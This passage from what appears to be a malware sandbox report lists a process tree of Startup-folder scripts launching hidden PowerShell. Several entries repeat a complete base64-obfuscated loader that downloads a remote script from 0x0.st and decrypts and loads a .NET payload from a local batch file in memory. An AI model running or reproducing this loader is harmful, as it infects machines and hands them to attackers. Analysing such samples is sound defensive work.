ZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkZnlyYnUpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRwa20gaW4gJHBlcGV2KSB7CWlmICgkcGttLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRwZGZ5dT0kcGttLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRsd2dvcz1bc3RyaW5nW11dJHBkZnl1LlNwbGl0KCdcJyk7SUVYICcka21zbHU9ZWJpYnQgKHNlcmp3IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGx3Z29zWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGRhenNqPWViaWJ0IChzZXJqdyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRsd2dvc1sxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtxaGhmbyAka21zbHUgJG51bGw7cWhoZm8gJGRhenNqICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 4780 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_be60077b.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5072 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_be60077b.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8144 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkZnlyYnUpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRwa20gaW4gJHBlcGV2KSB7CWlmICgkcGttLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRwZGZ5dT0kcGttLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRsd2dvcz1bc3RyaW5nW11dJHBkZnl1LlNwbGl0KCdcJyk7SUVYICcka21zbHU9ZWJpYnQgKHNlcmp3IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGx3Z29zWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGRhenNqPWViaWJ0IChzZXJqdyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRsd2dvc1sxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtxaGhmbyAka21zbHUgJG51bGw7cWhoZm8gJGRhenNqICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 1068 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_76fbe4d0.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6216 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_76fbe4d0.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7116 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkZnlyYnUpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRwa20gaW4gJHBlcGV2KSB7CWlmICgkcGttLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRwZGZ5dT0kcGttLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRsd2dvcz1bc3RyaW5nW11dJHBkZnl1LlNwbGl0KCdcJyk7SUVYICcka21zbHU9ZWJpYnQgKHNlcmp3IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGx3Z29zWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGRhenNqPWViaWJ0IChzZXJqdyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRsd2dvc1sxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtxaGhmbyAka21zbHUgJG51bGw7cWhoZm8gJGRhenNqICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 6492 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a2f15e19.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7624 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a2f15e19.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7612 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkZnlyYnUpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRwa20gaW4gJHBlcGV2KSB7CWlmICgkcGttLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRwZGZ5dT0kcGttLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRsd2dvcz1bc3RyaW5nW11dJHBkZnl1LlNwbGl0KCdcJyk7SUVYICcka21zbHU9ZWJpYnQgKHNlcmp3IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGx3Z29zWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGRhenNqPWViaWJ0IChzZXJqdyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRsd2dvc1sxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtxaGhmbyAka21zbHUgJG51bGw7cWhoZm8gJGRhenNqICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 5168 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2090f8f2.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
